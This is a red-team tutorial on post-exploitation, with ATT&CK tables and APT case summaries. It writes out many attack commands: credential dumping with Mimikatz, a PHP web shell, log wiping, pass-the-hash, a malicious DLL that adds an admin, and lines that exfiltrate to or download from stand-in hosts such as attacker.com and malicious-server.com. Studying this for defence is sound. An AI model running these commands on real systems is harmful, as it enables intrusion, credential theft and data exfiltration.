Art of Post-Exploitation

Post-exploitation in red teaming involves navigating and exploiting a compromised system to achieve deeper control and further access to sensitive data and networks. This phase follows initial access and lateral movement, focusing on persistence, privilege escalation, and data exfiltration. Key techniques include system enumeration to gather information such as running processes, installed software, and user credentials. Tools like Mimikatz are often used to extract passwords from memory, and PowerShell Empire is frequently employed to maintain communication with compromised machines, deploy additional payloads, and move laterally across the network. Red teams use these techniques to simulate sophisticated adversaries and mimic real-world cyberattacks.

The art of post-exploitation also emphasizes stealth and persistence, where red teamers avoid detection by evading security mechanisms and ensuring long-term access to target environments. Techniques such as DLL injection, registry modifications for persistence, and setting up custom Command and Control (C2) infrastructures help attackers maintain footholds in the compromised systems. These actions are often automated through advanced frameworks like Cobalt Strike or Metasploit, which streamline post-exploitation by enabling operators to manage compromised systems and deploy various exploits with minimal manual interaction. This phase is crucial for simulating high-level adversaries and testing an organization’s detection and response capabilities.

After gaining initial access to an organization’s network or systems, threat actors begin the post-exploitation phase. This phase is crucial because it enables attackers to achieve their end goals, such as data exfiltration, system control, or maintaining long-term access. Below are the key steps, tactics, and techniques commonly used during post-exploitation, specifically tailored for targeting organizational networks.

Steps

Step 1: Establish Persistence

• Objective: Ensure long-term access to the compromised system.
• Techniques: Attackers use methods like scheduled tasks (schtasks on Windows, cron jobs on Linux) or modifying startup scripts/registry keys to relaunch malware after reboot. On macOS, persistence can be achieved through .plist file modifications or launchd.
  • Example Command:
    • Windows: schtasks /create /tn "MyTask" /tr "malware.exe" /sc onstart
    • Linux: crontab -e (add malicious script to cron job)

Step 2: Credential Harvesting

• Objective: Steal credentials to access other systems and escalate privileges.
• Techniques: Tools like Mimikatz (for Windows) or gsecdump allow attackers to extract credentials from LSASS. In Linux, attackers may search for SSH keys or steal passwords stored in configuration files.
  • Example Command:
    • Windows: mimikatz "privilege::debug" "sekurlsa::logonpasswords"
    • Linux: cat ~/.ssh/id_rsa

Step 3: Privilege Escalation

• Objective: Gain administrative or root-level control.
• Techniques: Attackers exploit system misconfigurations or vulnerabilities like PrintNightmare (Windows) or SUID misconfigurations (Linux) to escalate privileges.
  • Example Command:
    • Windows: Exploiting CVE-2021-1675 (PrintNightmare) for SYSTEM privileges.
    • Linux: Exploiting SUID binaries: find / -perm -4000 -type f 2>/dev/null

Step 4: Lateral Movement

• Objective: Move within the target network to compromise other systems.
• Techniques: Attackers use protocols like SMB (Windows) or SSH (Linux) to move between systems, leveraging tools like PsExec or WMIC for Windows, and ssh hopping on Linux.
  • Example Command:
    • Windows: psexec \\target_ip -u admin -p password cmd
    • Linux: ssh user@remote_system

Step 5: Data Exfiltration

• Objective: Extract sensitive data from the compromised system/network.
• Techniques: Data can be exfiltrated using encrypted communication channels (e.g., SCP, TLS), DNS tunneling, or via cloud services like AWS S3.
  • Example Command:
    • Windows/Linux: scp sensitive_file.txt user@attacker.com:/home/user/data
    • Linux (DNS tunneling): iodine -f 10.0.0.1 attacker.com

Step 6: Evasion and Covering Tracks

• Objective: Avoid detection by security tools and remove evidence of compromise.
• Techniques: Attackers delete logs, obfuscate malware code, and disable antivirus tools. Commands like wevtutil (Windows) or log file deletion on Linux help remove traces of the attack.
  • Example Command:
    • Windows: wevtutil cl System
    • Linux: rm -rf /var/log/auth.log

Perspective

Advanced Persistent Threat (APT) groups frequently use a variety of techniques across different stages of the attack lifecycle, particularly during post-exploitation. These techniques are gathered and reported in threat intelligence reports like MITRE ATT&CK, Red Canary’s “Threat Detection Report,” and reports from security vendors. Below is a summary of some of the most commonly observed techniques from recent APT reports.

Tactic	Technique	Description	Examples & Tools
Execution	PowerShell	Executing scripts via PowerShell on Windows systems.	powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1
	AppleScript (macOS)	Abusing AppleScript to execute commands remotely or automate malicious tasks.	osascript -e 'tell application "System Events" to keystroke "Hello"'
	Command and Scripting Interpreter	Using Bash or CMD for running scripts and commands across platforms.	bash -c 'wget http://attacker.com/malware.sh'
	Reflective DLL Injection (Windows)	Injecting a malicious DLL into a trusted process to evade detection.	rundll32.exe malicious.dll, DllMain
	Rundll32 Execution (Windows)	Executing code through the rundll32.exe utility on Windows systems.	rundll32.exe shell32.dll, Control_RunDLL malware.dll

Tactic	Technique	Description	Examples & Tools
Exfiltration	Cloud Credential Theft (AWS)	Stealing AWS tokens and credentials to access sensitive cloud services.	aws s3 cp s3://sensitive-bucket /local --recursive
	DNS Tunneling	Exfiltrating data via DNS requests, often bypassing firewall controls.	iodine -f 10.0.0.1 attacker.com
	Encrypted Channels	Using encrypted protocols such as TLS or SSH to exfiltrate data, evading detection by network monitoring tools.	scp sensitive_data.txt user@attacker.com:/path
	Steganography	Embedding sensitive data into images or multimedia files to avoid detection during exfiltration.	steghide embed -cf cover.jpg -ef data.txt
	Email Forwarding Rules	Creating hidden email forwarding rules to siphon sensitive data from target inboxes.	Using cloud-based APIs or user access to create forward rules.

Tactic	Technique	Description	Examples & Tools
Evasion	Token Impersonation (Windows/Linux)	Stealing or forging authentication tokens to impersonate higher-privileged accounts.	Using mimikatz or Incognito tools to steal or inject tokens.
	Process Injection (Windows/Linux)	Injecting malicious code into legitimate processes to evade antivirus detection.	mimikatz.exe "privilege::debug" "inject::process lsass.exe"
	Obfuscated Files or Information	Using techniques to obscure the contents of files or obfuscate malware code.	Using packers, encrypting payloads, or hiding scripts in hidden file formats.
	Web Shell (Windows/Linux)	Deploying web shells on compromised web servers to maintain persistence.	<?php echo shell_exec($_GET['cmd']); ?>
	Indicator Removal on Host	Deleting logs, renaming tools, or wiping evidence of the attack to avoid detection.	wevtutil cl System (Windows), rm /var/log/auth.log (Linux)

Tactic	Technique	Description	Examples & Tools
Credential Access	LSASS Dumping (Windows)	Dumping the memory of LSASS to extract plaintext credentials or hashes.	procdump.exe -ma lsass.exe lsass_dump.dmp, mimikatz
	Kerberoasting (Windows)	Extracting Kerberos ticket-granting tickets (TGT) for offline brute-forcing.	GetUserSPNs.py -request -dc-ip <DomainController_IP>
	Credential Dumping via DCSync (Windows)	Mimicking domain controller behavior to retrieve password hashes using Mimikatz or secretsdump.py.	Invoke-Mimikatz -Command 'lsadump::dcsync /user:administrator'
	Password Spraying (Windows/Linux)	Attempting to brute force multiple accounts using a common password.	hydra -L userlist.txt -P passwordlist.txt <service>
	Keylogging (All Platforms)	Installing a keylogger to capture user inputs and steal credentials.	Using malware or custom scripts to capture keystrokes.

Tactic	Technique	Description	Examples & Tools
Privilege Escalation	Token Impersonation	Stealing or creating access tokens to impersonate higher-privileged users.	Invoke-TokenManipulation -Impersonate -User admin
	Exploitation of Vulnerabilities (CVE)	Exploiting known vulnerabilities to escalate privileges (e.g., CVE-2021-1675 PrintNightmare).	Example: exploit/windows/local/printnightmare
	Sudo and SUID Abuse (Linux)	Abusing misconfigured SUID files or improper sudo settings for privilege escalation.	sudo -u#-1 /bin/bash (misconfigured sudoers)
	DLL Hijacking (Windows)	Abusing DLL search order to load malicious DLLs under the context of a trusted application.	Placing malicious DLL in the directory of a vulnerable app.
	Weak Permission Abuse	Exploiting weak permissions on critical files or services to modify them and gain higher privileges.	chmod 777 /etc/shadow, modifying executable scripts or system services.

Tactic	Technique	Description	Examples & Tools
Lateral Movement	PsExec (Windows)	Remotely executing commands on other systems via SMB using PsExec.	psexec \\target -u administrator -p password cmd
	WMI Execution (Windows)	Using WMI to execute commands on remote systems within the same network.	wmic /node:remotehost process call create "cmd.exe /c whoami"
	Remote Desktop Protocol (RDP)	Using RDP to access remote systems and move laterally across a network.	xfreerdp /u:user /p:password /v:victim_ip
	Pass-the-Hash (Windows)	Using stolen NTLM hashes to authenticate without needing plaintext credentials.	mimikatz "sekurlsa::pth /user:Administrator /domain:corp /ntlm:<hash>"
	SSH Hopping (Linux)	Using stolen SSH keys or credentials to move laterally across Linux machines.	ssh -i ~/.ssh/id_rsa user@target

Command and Control (C2) Techniques

Command and Control (C2) techniques allow attackers to maintain persistent control over compromised systems within a target network, directing malware operations, exfiltrating data, or triggering further attacks. Below are various C2 techniques along with relevant commands and attack scenarios:

Web Shells

Attackers use web shells, typically uploaded to a compromised web server, to maintain persistent access. Once a web shell is in place (e.g., in PHP or ASPX), it allows attackers to remotely execute commands like curl or wget to download additional malware or tools.

curl http://malicious-server.com/payload.sh | bash

Scenario: After exploiting a vulnerability in a website (like file upload vulnerability), an attacker uploads a PHP web shell. Through this shell, they can remotely execute commands to maintain access, escalate privileges, or download further malware.

DNS Tunneling

DNS tunneling is a technique where attackers use DNS requests to exfiltrate data or communicate with a C2 server. Tools like iodine are often used for this purpose.

iodine -f dns.malicious-domain.com

Scenario: A compromised machine within the network is configured to send DNS requests to the attacker’s C2 server. The traffic appears as legitimate DNS queries, which are often overlooked by security teams.

Encrypted Channels (TLS/SSH)

Attackers use encryption to hide communication between compromised devices and C2 servers, making detection challenging. Tools like stunnel are used to wrap malicious communications in TLS.

stunnel /etc/stunnel/stunnel.conf

Scenario: After gaining access to a network, an attacker sets up an encrypted tunnel using stunnel between the compromised host and their C2 server, allowing them to securely transmit stolen data or send additional commands without triggering alerts.

Proxy Chains

Attackers often use proxy chains to route their communications through multiple intermediate systems, making it harder to trace or block their C2 traffic. Tools like Proxifier or proxychains are used to implement this.

proxychains curl http://malicious-domain.com/payload.sh

Scenario: An attacker routes their communications through multiple compromised systems or proxies, masking their true location and making detection and response more difficult.

Remote Access Trojans (RATs)

RATs like Cobalt Strike allow attackers to fully control compromised machines via HTTP or HTTPS, executing commands remotely. RATs are used to maintain persistence, pivot to other systems, or escalate privileges.

./cobaltstrike --script launch_beacon http://malicious-c2.com

Scenario: After successfully delivering a Cobalt Strike beacon, the attacker can use the RAT to gain full control over the machine, execute commands, or further exfiltrate data using encrypted communication channels.

Persistence Techniques

Kernel Modules and Extensions

APT Usage: Linux-based APT groups like Lazarus have exploited kernel module loading to maintain persistence across reboots.

insmod malicious.ko

• Countermeasure:
  • Ensure kernel modules are signed and integrity-checked before loading.
  • Monitor for unauthorized kernel module loads using audit logs.

Scheduled Tasks and Cron Jobs

Attackers often use scheduled tasks on Windows to maintain access. For example, an attacker could use the following command to create a persistent task that launches a backdoor at specific intervals:

schtasks /create /sc daily /tn "BackdoorTask" /tr "C:\backdoor.exe" /st 12:00

Similarly, on Linux/macOS systems, attackers create cron jobs by editing crontab files:

(crontab -l ; echo "0 * * * * /usr/bin/backdoor.sh") | crontab -

Registry Keys

Modifying Windows registry keys ensures that malicious programs run on startup. Attackers use the reg add command or tools like SharPersist to create or modify registry entries. For example, to add a malicious executable to the Run key:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Malware" /t REG_SZ /d "C:\malware.exe"

Alternatively, using SharPersist:

SharPersist -t reg -c "C:\malware.exe" -a "/c C:\malware.exe" -k "hklmrun" -v "Malware" -m add

This allows persistence across reboots​

Service Abuse

Attackers modify services to run malicious code, such as by altering services via sc config or directly manipulating the services.msc GUI. Example:

sc config MyService binpath= "C:\malicious_service.exe"

Plist Modification (macOS)

On macOS, attackers can modify plist files to launch malicious payloads via launchd. Example:

launchctl load /Library/LaunchDaemons/com.malicious.plist

DLL Hijacking

DLL Hijacking is another persistence technique where attackers replace legitimate DLLs with malicious ones, allowing the system to execute the malicious DLL on startup or during legitimate software execution. A typical method includes placing the malicious DLL in the path where the application expects to find the legitimate one, thus tricking the application into executing the attacker’s code.

Credential Access Techniques

LSASS Dumping

Attackers can dump the memory of LSASS.exe to extract credentials using tools like Mimikatz or Procdump:

procdump -ma lsass.exe lsass.dmp

Then extract credentials from the dump using Mimikatz:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit

Kerberoasting

Kerberoasting targets Kerberos tickets to brute-force service accounts. The attacker can use GetUserSPNs.py to request and brute-force service tickets:

python GetUserSPNs.py -request -dc-ip <DomainControllerIP> DOMAIN/user

This will request a ticket for service accounts that can be later cracked using tools like Hashcat.

Credential Harvesting via Web Browsers

Attackers can harvest credentials stored in browsers by accessing the files where browsers store data or by using malware designed to extract credentials. For example, an attacker might retrieve Chrome’s stored credentials by accessing the Login Data SQLite file and decrypting it.

Password Spraying

Password spraying attempts a common password across many accounts instead of brute-forcing a single account. Tools like Hydra or CrackMapExec can be used:

crackmapexec smb <targetIP> -u usernames.txt -p password123 --spray

Keylogging

A keylogger records keystrokes to steal credentials. Attackers may develop custom malware that implements keylogging functionality or use tools like Metasploit for post-exploitation keylogging:

meterpreter > keyscan_start

Privilege Escalation Techniques

Token Impersonation

Token impersonation remains an effective privilege escalation technique, especially when leveraging stolen tokens of high-privileged accounts. Tools like Incognito (part of Meterpreter) allow attackers to impersonate tokens of other users:

meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"

This allows an attacker to impersonate SYSTEM or other privileged accounts undetected.

CVE Exploitation (PrintNightmare)

Exploiting known vulnerabilities, such as PrintNightmare (CVE-2021-34527), is still a common method. Attackers can gain SYSTEM-level access by exploiting the Windows Print Spooler service. Tools like Mimikatz automate this process:

Invoke-Nightmare -NewUser "attacker" -NewPassword "P@ssword123" -AddUserToLocalGroup

This adds a new user with elevated privileges.

Sudo and SUID Abuse (Linux)

Attackers abuse SUID binaries or misconfigured sudo privileges to escalate privileges. For instance, if a binary with the SUID bit set is writable, it can be replaced with a malicious one:

echo '#!/bin/bash\n/bin/bash' > /tmp/suidbash
chmod +x /tmp/suidbash
/tmp/suidbash

This provides root access if the binary runs with root permissions.

DLL Search Order Hijacking

In Windows environments, attackers abuse DLL search order to load malicious DLLs by placing them in locations that are loaded by legitimate applications. The attacker creates a malicious DLL in a directory where a program searches for the legitimate one:

// Example malicious DLL code
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    system("net localgroup administrators attacker /add");
    return TRUE;
}

This technique is difficult to detect because it abuses legitimate OS behavior.

Weak Permission Abuse

Attackers can modify files or directories with weak permissions to escalate privileges. For instance, if the passwd file is writable, an attacker can modify it to gain root access on a Linux system.

Lateral Movement Techniques:

PsExec and SMB

PsExec is commonly used for lateral movement. Attackers execute commands on remote machines over SMB:

psexec.exe \\target -u DOMAIN\admin -p password cmd.exe

This executes cmd.exe on the target machine, allowing further movement in the network.

WMI (Windows Management Instrumentation)

WMI enables remote command execution across a network. Attackers use WMI to spawn processes on remote systems, bypassing traditional detection:

wmic /node:192.168.1.10 process call create "cmd.exe /c calc.exe"

This runs calc.exe on the remote host, allowing further lateral movement.

Remote Desktop Protocol (RDP)

Once valid credentials are obtained, attackers often use RDP for stealthy movement. Configuring xfreerdp for an RDP session:

xfreerdp /u:admin /p:password /v:192.168.1.10

This command connects to the target over RDP, granting full control over the remote machine.

Pass-the-Hash (PTH)

Using NTLM hash dumps from tools like Mimikatz, attackers authenticate to other systems without knowing the plaintext password:

mimikatz # sekurlsa::pth /user:Administrator /domain:corp /ntlm:<NTLM Hash> /run:powershell.exe

This grants lateral access to network machines without raising alarms related to password brute-forcing.

SSH Hopping (Linux)

Compromising SSH keys allows attackers to hop across Linux machines without passwords:

ssh -i stolen_key user@target.com

By using stolen or weak SSH keys, attackers can move laterally across Linux environments undetected.

Stories

1. RedJuliett APT

In a cyber-espionage campaign between November 2023 and April 2024, RedJuliett targeted government, academic, and technology organizations in Taiwan and other countries. After gaining initial access via SQL injection and directory traversal exploits, they used T1071.001 – Application Layer Protocol: Web Protocols to establish command and control (C2) by creating SoftEther VPN bridges. Post-exploitation, they deployed open-source web shells for persistent access and leveraged T1068 – Exploitation for Privilege Escalation in Linux environments, using an elevation of privilege vulnerability to maintain control over the compromised systems. This APT group has been associated with aliases like Flax Typhoon​

Malware Protection & Internet Security

2. UNC3886 VMware Attacks

UNC3886 has been active in exploiting vulnerabilities in VMware ESXi virtual machines. In post-exploitation, the group used rootkits such as Reptile and Medusa to hide in compromised systems. They also used GitHub and Google Drive as T1105 – Ingress Tool Transfer for C2 communications. This group targeted the government and technology sectors, exploiting VMware vulnerabilities like CVE-2022-22948 and CVE-2023-34048, often using custom malware tools like Mopsled and Riflespine​

Kaspersky ICS CERT

3. Mustang Panda’s Korplug Loader

In Q1 2024, Mustang Panda targeted cargo shipping companies across Norway, Greece, and the Netherlands. They executed post-exploitation techniques using T1564.001 – Hide Artifacts: Hidden Files and Directories by deploying Korplug loaders with invalid digital signatures to evade detection. The group employed T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking by hijacking the DLL search order of an outdated version of Nero WaveEditor software, giving them execution control in the victim’s environment​

Kaspersky ICS CERT
Malware Protection & Internet Security

4. MuddyWater RMM Abuse

MuddyWater, an APT with ties to middle east threat actors, expanded its post-exploitation activities in late 2023 by abusing legitimate remote monitoring and management (RMM) tools like Atera Agent and Tactical RMM. They leveraged T1078 – Valid Accounts by registering these tools using compromised business email accounts. This allowed the group to persist in environments across multiple sectors, including telecommunications and logistics. They used spear-phishing to deliver payloads and abused PowerShell to install malicious DLLs, exploiting T1059.001 – Command and Scripting Interpreter: PowerShell for lateral movement and persistence​

Kaspersky ICS CERT

5. POLONIUM’s Python Backdoor

POLONIUM, an APT linked to Hezbollah interests, conducted an attack against Israeli organizations in November 2023. They used a Python-based backdoor known as MegaPy to exfiltrate sensitive data, leveraging T1071.003 – Application Layer Protocol: WebDAV for C2 communications. The group implemented encrypted payloads tailored for each victim, using cloud services like MEGA and Nextcloud for data storage. They also used T1027 – Obfuscated Files or Information to mask the exploit chain and evade detection​

Kaspersky ICS CERT
Malware Protection & Internet Security

---

Credential Access Techniques

APT Usage: APT3 and APT29 are known to use tools like Mimikatz to dump credentials from memory in Windows environments, especially in Active Directory.

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

• Countermeasure:
  • Disable Wdigest authentication in the registry to prevent storing plaintext passwords in memory.
  • Use Windows Defender Credential Guard to protect against credential dumping.

Exfiltration Techniques

Ingress Tool Transfer

APT Usage: APT groups often transfer malicious payloads during exfiltration or lateral movement, such as Cobalt Strike or Rundll32 payloads.

certutil.exe -urlcache -split -f http://malicious-url.com/payload.exe payload.exe

Countermeasure:

• Block execution of certutil.exe unless explicitly required.
• Restrict outbound traffic using firewalls and monitor for unusual HTTP traffic.

Evasion Techniques

Obfuscated Files or Information

APT Usage: APT28 and other groups frequently use obfuscation to bypass detection. Tools like Impacket and custom scripts are commonly used to encrypt or encode data exfiltration or C2 traffic.

openssl enc -aes-256-cbc -salt -in data.txt -out data.enc

• Monitor for unusual file creation and encryption patterns, especially on endpoints with no encryption activities.
• Analyze logs for unusual base64 encoded commands or file extensions.

Security Researcher

• Fazel Mohammad Ali Pour(https://x.com/ArganexEmad)